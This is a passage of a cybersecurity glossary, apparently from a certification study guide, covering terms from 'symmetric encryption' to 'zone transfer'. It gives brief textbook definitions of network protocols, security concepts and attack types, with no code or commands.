symmetric encryption   A type of encryption where the same key is used to encrypt and decrypt the message.

SYN attack   A type of denial-of-service attack where a hacker sends thousands of SYN packets to the target with spoofed IP addresses.

SYN flood attack   A type of attack used to deny service to legitimate users of a network resource by intentionally overloading the network with illegitimate TCP connection requests. SYN packets are sent repeatedly to the target, but the corresponding SYN/ACK responses are ignored.

syslog   A protocol used for sending and receiving log information for nodes on a network.

TACACS   Terminal Access Controller Access-Control System. A remote authentication protocol that is used to communicate with an authentication server commonly used in Unix networks.

target of engagement (TOE)   The software product or system that is the subject of an evaluation.

telnet   A protocol used in networking to provide a bidirectional, interactive, text-oriented communication facility over a virtual terminal connection. Commands entered locally are executed on the remote system.

Temporal Key Integrity Protocol (TKIP)   A security protocol used in IEEE 802.11i to replace WEP without the requirement to replace legacy hardware.

third party   A person or entity indirectly involved in a relationship between two principals.

threat   Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

three-way (TCP) handshake   A three-step process computers execute to negotiate a connection with one another. The three steps are SYN, SYN/ACK, and ACK.

tiger team   A group of people, gathered together by a business entity, working to address a specific problem or goal.

time bomb   A program designed to execute at a specific time to release malicious code onto the computer system or network.

time to live (TTL)   A limit on the amount of time, or the number of hops or retransmissions, that a packet can experience in a computer network before it is discarded.

timestamping   Recording the time, normally in a log file, when an event happens or when information is created or modified.

Tini   A small Trojan program that listens on port 777.

traceroute   A utility that traces a packet from your computer to an Internet host, showing how many hops the packet takes to reach the host and how long the packet requires to complete the hop.

Transmission Control Protocol (TCP)   A connection-oriented, Layer 4 protocol for transporting data over network segments. TCP is considered reliable because it guarantees delivery and the proper reordering of transmitted packets. This protocol is used for most long-haul traffic on the Internet.

Transport Layer Security (TLS)   A standard for encrypting e-mail, web pages, and other stream-oriented information transmitted over the Internet.

trapdoor function   A function that is easy to compute in one direction yet believed to be difficult to compute in the opposite direction (finding its inverse) without special information, called the trapdoor. This function is widely used in cryptography.

Trojan horse   A non-self-replicating program that appears to have a useful purpose but in reality has a different, malicious purpose.

trusted computer base (TCB)   The set of all hardware, firmware, and/or software components critical to IT security. Bugs or vulnerabilities occurring inside the TCB might jeopardize the security properties of the entire system.

Trusted Computer System Evaluation Criteria (TCSEC)   A U.S. Department of Defense (DoD) standard that sets basic requirements for assessing the effectiveness of computer security controls built into a computer system.

tumbling   The act of using numerous electronic serial numbers on a cell phone until a valid number is located.

tunnel   A point-to-point connection between two endpoints created to exchange data. Typically a tunnel is either an encrypted connection or a connection using a protocol in a method for which it was not designed. An encrypted connection forms a point-to-point connection between sites in which only the sender and the receiver of the data see it in a clear state.

tunneling   Transmitting one protocol encapsulated inside another protocol.

tunneling virus   A self-replicating malicious program that attempts installation beneath antivirus software by directly intercepting the interrupt handlers of the operating system to evade detection.

Unicode   An international encoding standard, working within multiple languages and scripts, that represents each letter, digit, or symbol with a unique numeric value that applies across different platforms.

Uniform Resource Locator (URL)   A string that represents the location of a web resource—most often a website.

User Datagram Protocol (UDP)   A connectionless, Layer 4 transport protocol. UDP is faster than TCP but offers no reliability. A best effort is made to deliver the data, but no checks and verifications are performed to guarantee delivery. Therefore, UDP is termed a connectionless protocol. UDP is simpler to implement and is used where a small amount of packet loss is acceptable, such as for streaming video and audio.

Vehicle Ad Hoc Network (VANET)   The communications network used by IoT-enabled vehicles; refers to the spontaneous creation of a wireless network for vehicle-to-vehicle (V2V) data exchange.

Videocipher II Satellite Encryption System   The brand name of analog scrambling and de-scrambling equipment for cable and satellite television, invented primarily to keep consumer television receive-only (TVRO) satellite equipment from receiving TV programming except on a subscription basis.

virtual local area network (VLAN)   Devices, connected to one or more switches, grouped logically into a single broadcast domain. Administrators can divide the devices connected to the switches into multiple VLANs without requiring separate physical switches.

virtual private network (VPN)   A technology that establishes a tunnel to create a private, dedicated, leased-line network over the Internet. The data is encrypted so it’s readable only by the sender and receiver. Companies commonly use VPNs to allow employees to connect securely to the company network from remote locations.

virtualization   A practice whereby the physical aspects of the hardware are virtually presented to operating systems in a way that allows one or more virtual machines (with their own operating systems) to run simultaneously on the same physical box.

virus   A malicious computer program with self-replication capabilities that attaches to another file and moves with the host from one computer to another.

virus hoax   An e-mail message that warns users of a nonexistent virus and encourages them to pass on the message to other users.

vishing   Social engineering attacks using a phone.

vulnerability   Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.

vulnerability assessment   Formal description and evaluation of the vulnerabilities in an information system.

vulnerability management   The cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities.

vulnerability scanning   Sending packets or requests to another system to gain information to be used to identify weaknesses and protect the system from attacks.

war chalking   Drawing symbols in public places to alert others to an open Wi-Fi network. War chalking can include the SSIDs, administrative passwords to APs, and other information.

war dialing   The act of dialing all numbers within an organization to discover open modems.

war driving   The act of searching for Wi-Fi wireless networks by a person in a moving vehicle, using a portable device.

warm site   An environmentally conditioned workspace partially equipped with IT and telecommunications equipment to support relocated IT operations in the event of a significant disruption.

web spider   A program designed to browse websites in an automated, methodical manner. Sometimes these programs are used to harvest information from websites, such as e-mail addresses.

white-box testing   A pen testing method where the attacker knows all information about the internal network. It is designed to simulate an attack by a disgruntled systems administrator or similar level.

Whois   A query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address, or an autonomous system.

wide area network (WAN)   Two or more LANs connected by a high-speed line across a large geographical area.

Wi-Fi   A term trademarked by the Wi-Fi Alliance, used to define a standard for devices to use to connect to a wireless network.

Wi-Fi Protected Access (WPA)   Provides data encryption for IEEE 802.11 wireless networks so data can be decrypted only by the intended recipients.

Wired Equivalent Privacy (WEP)   A security protocol for wireless local area networks defined in the 802.11b standard; intended to provide the same level of security as a wired LAN. WEP is not considered strong security, although it does authenticate clients to access points, encrypt information transmitted between clients and access points, and check the integrity of each packet exchanged.

wiretapping   The monitoring of telephone or Internet conversations, typically by covert means.

worm   A self-replicating, self-propagating, self-contained program that uses networking mechanisms to spread itself.

wrapper   Software used to bind a Trojan and a legitimate program together so the Trojan will be installed when the legitimate program is executed.

XOR operation   A mathematical operation requiring two binary inputs: if the inputs match, the output is a 0; otherwise, it is a 1.

Zenmap   A Windows-based GUI version of Nmap.

zero subnet   In a classful IPv4 subnet, this is the network number with all binary 0s in the subnet part of the number. When written in decimal, the zero subnet has the same number as the classful network number.

zero-day attack   An attack carried out on a system or application before the vendor becomes aware and before a patch or fix action is available to correct the underlying vulnerability.

zombie   A computer system that performs tasks dictated by an attacker from a remote location. Zombies may be active or idle, and owners of the systems generally do not know their systems are compromised.

zone transfer   A type of DNS transfer where all records from an SOA are transmitted to the requestor. Zone transfers have two options: full (opcode AXFR) and incremental (IXFR).
